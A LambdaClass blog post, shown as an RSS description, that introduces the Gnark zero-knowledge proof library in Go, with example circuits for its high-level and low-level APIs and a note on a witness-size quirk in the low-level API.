          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-use-the-consenyss-gnark-zero-knowledge-proof-library-and-disclosure-of-a-ddos-bug/">&lt;p&gt;Zero Knowledge Proofs (ZKP) are a powerful cryptographic technique that allows two parties to exchange information without revealing any sensitive data. This method has the potential to revolutionize the way we handle privacy and security in various industries, such as finance, healthcare, and government. However, developing ZKP applications has traditionally been a challenging task, requiring a deep understanding of cryptography, programming, and mathematics.&lt;&#x2F;p&gt;
&lt;p&gt;Fortunately, with the advancement of technology and the development of new libraries and frameworks, writing ZKP applications has become much easier. Nowadays, there are several libraries available that can significantly reduce the complexity of developing ZKP applications, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;&quot;&gt;LambdaWorks&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;arkworks-rs&#x2F;&quot;&gt;Arkworks&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ConsenSys&#x2F;gnark&quot;&gt;Gnark&lt;&#x2F;a&gt;. These libraries provide developers with a set of tools and building blocks that simplify the implementation of complex cryptographic protocols.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will focus on reviewing Gnark, one of the most powerful and user-friendly libraries available for ZKP development. Gnark is an open-source library that provides developers with a high-level programming language and a set of tools to build efficient and secure ZKP applications. We will explore the features and benefits of Gnark and show how it can simplify the process of building ZKP applications.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-gnark&quot;&gt;What is Gnark&lt;&#x2F;h2&gt;
&lt;p&gt;Gnark, written in Go, is a fast ZK-SNARK library that offers both a high-level API and a low-level API to design circuits. The library is open-source and developed under the Apache 2.0 license.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;why-gnark&quot;&gt;Why Gnark&lt;&#x2F;h2&gt;
&lt;p&gt;We are using Gnark as a backend for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;noir-lang&#x2F;noir&quot;&gt;Noir&lt;&#x2F;a&gt;. Noir is a domain-specific language for creating and verifying proofs. Noir compiles to an intermediate language which itself can be compiled to an arithmetic circuit or a rank-1 constraint system. This in itself brings up a few challenges within the design process but allows one to decouple the programming language completely from the backend. This is similar in theory to LLVM.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;zk-with-gnark&quot;&gt;ZK with Gnark&lt;&#x2F;h2&gt;
&lt;p&gt;The main flow for generating a ZK-Proof and verifying it would be:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Arithmetization: This is generating the R1CS or Sparse R1CS circuit with its constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Generate a proof of execution for this circuit, given some public and private variables.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Verify said proof with the same public inputs used when generating the proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
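&lt;p&gt;The three numbered steps map onto Gnark’s high-level API roughly as follows. This is only a sketch, assuming a Groth16 proof over the BN254 curve and some circuit type &lt;code&gt;Circuit&lt;&#x2F;code&gt; implementing &lt;code&gt;Define&lt;&#x2F;code&gt; with a concrete &lt;code&gt;assignment&lt;&#x2F;code&gt; of its inputs; exact package paths may vary between Gnark versions, and error handling is elided:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; 1. Arithmetization: compile the circuit into an R1CS.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;var circuit Circuit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &amp;amp;circuit)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; One-time setup producing the proving and verifying keys.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pk, vk, _ := groth16.Setup(ccs)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; 2. Prove: build a witness from the concrete assignment and generate the proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;witness, _ := frontend.NewWitness(&amp;amp;assignment, ecc.BN254.ScalarField())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;proof, _ := groth16.Prove(ccs, pk, witness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; 3. Verify the proof against the public part of the witness.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;publicWitness, _ := witness.Public()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;err := groth16.Verify(proof, vk, publicWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;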
&lt;p&gt;Gnark has both a high-level API and a low-level API. The main difference lies in the arithmetization: the high-level API abstracts you, as a user, from building the &lt;code&gt;R1CS&lt;&#x2F;code&gt; or &lt;code&gt;SparseR1CS&lt;&#x2F;code&gt;, while with the low-level API you need to build them by hand, constraint by constraint.&lt;&#x2F;p&gt;
&lt;p&gt;In the following sections we’re going to explain and show some example usage of the high-level and the low-level APIs. We’ll start with the bright side of Gnark: the high-level API.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;always-look-on-the-bright-side&quot;&gt;(Always look on) the bright side&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Xs1ASoT.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;high-level-api&quot;&gt;High-level API&lt;&#x2F;h3&gt;
&lt;p&gt;Gnark’s high-level API lives in the &lt;code&gt;frontend&lt;&#x2F;code&gt; package, which you can find in the root of the repo.&lt;&#x2F;p&gt;
&lt;p&gt;Earlier we said that the main difference lies in the arithmetization, but what does this mean? By arithmetization we basically mean building the circuit with which you’re going to generate your proof.&lt;&#x2F;p&gt;
&lt;p&gt;In the case of the &lt;code&gt;frontend&lt;&#x2F;code&gt; package, building a circuit means creating your circuit struct, whose fields must be the variables of the circuit (a.k.a. circuit inputs), labeled as public or secret (unlabeled fields are assumed secret by default). These inputs must be of type &lt;code&gt;frontend.Variable&lt;&#x2F;code&gt; and make up the witness. The witness has a secret part, known only to the prover, and a public part, known to both the prover and the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;After you have your circuit structure built, you need to define the circuit’s behaviour. You do this by writing a &lt;code&gt;Define&lt;&#x2F;code&gt; function. &lt;code&gt;Define&lt;&#x2F;code&gt; declares the circuit logic. The compiler then produces a list of constraints which must be satisfied by a valid witness in order to create a valid ZK-SNARK. The circuit in the example below proves knowledge of the factorisation of the RSA-250 challenge.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;example-rsa-from-gnark-s-playground&quot;&gt;Example: RSA (from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;play.gnark.io&#x2F;&quot;&gt;gnark’s playground&lt;&#x2F;a&gt;)&lt;&#x2F;h4&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;type Circuit struct {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    P   frontend.Variable &#x2F;&#x2F; p  --&amp;gt; secret visibility (default)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Q   frontend.Variable `gnark:&amp;quot;q,secret&amp;quot;` &#x2F;&#x2F; q  --&amp;gt; secret visibility&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    RSA frontend.Variable `gnark:&amp;quot;,public&amp;quot;`  &#x2F;&#x2F; rsa  --&amp;gt; public visibility&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;func (circuit *Circuit) Define(api frontend.API) error {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ensure we don&amp;#39;t accept RSA * 1 == RSA&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    api.AssertIsDifferent(circuit.P, 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    api.AssertIsDifferent(circuit.Q, 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; compute P * Q and store it in the local variable rsa.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rsa := api.Mul(circuit.P, circuit.Q)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; assert that the statement P * Q == RSA is true.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    api.AssertIsEqual(circuit.RSA, rsa)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return nil&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;join-the-dark-side&quot;&gt;(Join) the dark side&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;P4W3s57.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;low-level-api&quot;&gt;Low-level API&lt;&#x2F;h3&gt;
&lt;p&gt;In the &lt;code&gt;constraint&lt;&#x2F;code&gt; package, located at the root of the repo, we can find almost everything we need to write an R1CS (for Groth16) or a SparseR1CS (for Plonk) “by hand”. By hand we mean building our circuit constraint by constraint. We said almost because we’ll also need some pieces from the &lt;code&gt;gnark-crypto&lt;&#x2F;code&gt; library, which provides elliptic curve and pairing-based cryptography and various algorithms of particular interest to zero-knowledge proof systems.&lt;&#x2F;p&gt;
&lt;p&gt;We say that the arithmetization here is by hand because both the circuit structure and the constraints need to be written manually.&lt;&#x2F;p&gt;
&lt;p&gt;To add the circuit inputs you have the methods &lt;code&gt;AddPublicVariable&lt;&#x2F;code&gt;, &lt;code&gt;AddSecretVariable&lt;&#x2F;code&gt; and &lt;code&gt;AddInternalVariable&lt;&#x2F;code&gt;. Calling these methods returns an index which corresponds to the position of that variable’s concrete value in the witness vector. The order in which you call them matters, because each call mutates an internal current-witness index in the circuit you’re building.&lt;&#x2F;p&gt;
&lt;p&gt;The circuit behaviour, which in the high-level API is written in the &lt;code&gt;Define&lt;&#x2F;code&gt; function abstracted from manual constraint generation, is here defined constraint by constraint with the &lt;code&gt;AddConstraint&lt;&#x2F;code&gt; method. A constraint can be built by initializing a &lt;code&gt;constraint.R1C&lt;&#x2F;code&gt; (in the case of Groth16) or a &lt;code&gt;constraint.SparseR1C&lt;&#x2F;code&gt; (in the case of Plonk) term by term. Finally, terms can be created using the &lt;code&gt;MakeTerm&lt;&#x2F;code&gt; method.&lt;&#x2F;p&gt;
&lt;p&gt;After this, the next steps (proving and verifying) are the same as in the high level API.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;example-proving-that-x-cdot-y-z&quot;&gt;Example: proving that $x \cdot y = z$&lt;&#x2F;h4&gt;
&lt;p&gt;The next piece of code proves that $x \cdot y = z$, where $x, z$ are public variables and $y$ is a private variable (witness):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;func Example() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; [Y, Z]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    publicVariables := []fr_bn254.Element{fr_bn254.NewElement(2), fr_bn254.NewElement(6)}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; [X]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    secretVariables := []fr_bn254.Element{fr_bn254.NewElement(3)}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* R1CS Building *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; (X * Y) == Z&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; X is secret&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Y is public&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Z is public&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    r1cs := cs_bn254.NewR1CS(1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Variables&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    _ = r1cs.AddPublicVariable(&amp;quot;1&amp;quot;) &#x2F;&#x2F; the ONE_WIRE&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Y := r1cs.AddPublicVariable(&amp;quot;Y&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Z := r1cs.AddPublicVariable(&amp;quot;Z&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    X := r1cs.AddSecretVariable(&amp;quot;X&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Coefficients&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    COEFFICIENT_ONE := r1cs.FromInterface(1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Constraints&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; (1 * X) * (1 * Y) == (1 * Z)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    constraint := constraint.R1C{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        L: constraint.LinearExpression{r1cs.MakeTerm(&amp;amp;COEFFICIENT_ONE, X)}, &#x2F;&#x2F; 1 * X&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        R: constraint.LinearExpression{r1cs.MakeTerm(&amp;amp;COEFFICIENT_ONE, Y)}, &#x2F;&#x2F; 1 * Y&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        O: constraint.LinearExpression{r1cs.MakeTerm(&amp;amp;COEFFICIENT_ONE, Z)}, &#x2F;&#x2F; 1 * Z&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    r1cs.AddConstraint(constraint)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    constraints, r := r1cs.GetConstraints()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for _, r1c := range constraints {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        fmt.Println(r1c.String(r))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* Universal SRS Generation *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pk, vk, _ := groth16.Setup(r1cs)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* Proving *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rightWitness := buildWitnesses(r1cs, publicVariables, secretVariables)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    p, _ := groth16.Prove(r1cs, pk, rightWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* Verification *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    publicWitness, _ := rightWitness.Public()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifies := groth16.Verify(p, vk, publicWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fmt.Println(&amp;quot;Verifies with the right public values :&amp;quot;, verifies == nil)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    wrongPublicVariables := []fr_bn254.Element{fr_bn254.NewElement(1), fr_bn254.NewElement(5)}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    wrongWitness := buildWitnesses(r1cs, wrongPublicVariables, secretVariables)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    wrongPublicWitness, _ := wrongWitness.Public()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifies = groth16.Verify(p, vk, wrongPublicWitness)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fmt.Println(&amp;quot;Verifies with the wrong public values :&amp;quot;, verifies == nil)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To be able to run this, you’ll need the &lt;code&gt;buildWitnesses&lt;&#x2F;code&gt; function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;func buildWitnesses(r1cs *cs_bn254.R1CS, publicVariables fr_bn254.Vector, privateVariables fr_bn254.Vector) witness.Witness {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witnessValues := make(chan any)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    go func() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        defer close(witnessValues)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        for _, publicVariable := range publicVariables {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            witnessValues &amp;lt;- publicVariable&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        for _, privateVariable := range privateVariables {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            witnessValues &amp;lt;- privateVariable&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witness, err := witness.New(r1cs.CurveID().ScalarField())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if err != nil {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        log.Fatal(err)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; -1 because the first variable is the ONE_WIRE.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    witness.Fill(r1cs.GetNbPublicVariables()-1, r1cs.GetNbSecretVariables(), witnessValues)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return witness&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;a-small-bug&quot;&gt;A small bug&lt;&#x2F;h3&gt;
&lt;p&gt;There’s a minor detail you have to take into account when using the low-level API. Maybe you’ve noticed it already, but if not, take a look at this line in the example above:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;_ = r1cs.AddPublicVariable(&amp;quot;1&amp;quot;) &#x2F;&#x2F; the ONE_WIRE&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;You’re probably wondering why this is necessary if we are not using the variable returned by the function. Let’s find out: remove that line, remove the matching patch in the &lt;code&gt;buildWitnesses&lt;&#x2F;code&gt; function (the &lt;code&gt;-1&lt;&#x2F;code&gt; in the &lt;code&gt;witness.Fill&lt;&#x2F;code&gt; line), and execute the code.&lt;&#x2F;p&gt;
&lt;p&gt;When doing that you’ll get this error:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;18:32:36 ERR error=&amp;quot;invalid witness size, got 3, expected 2 = 1 (public) + 1 (secret)&amp;quot; backend=groth16 nbConstraints=1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The error says that 2 variables are expected (1 public and 1 private), which is wrong: we’ve already declared 3 variables (2 public and 1 private).&lt;&#x2F;p&gt;
&lt;p&gt;The reason why this happens and why the patch works is beyond the scope of this post, but it’s a gnark implementation detail that leaked into the API. You can read more about it in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ConsenSys&#x2F;gnark&#x2F;issues&#x2F;544&quot;&gt;issue&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
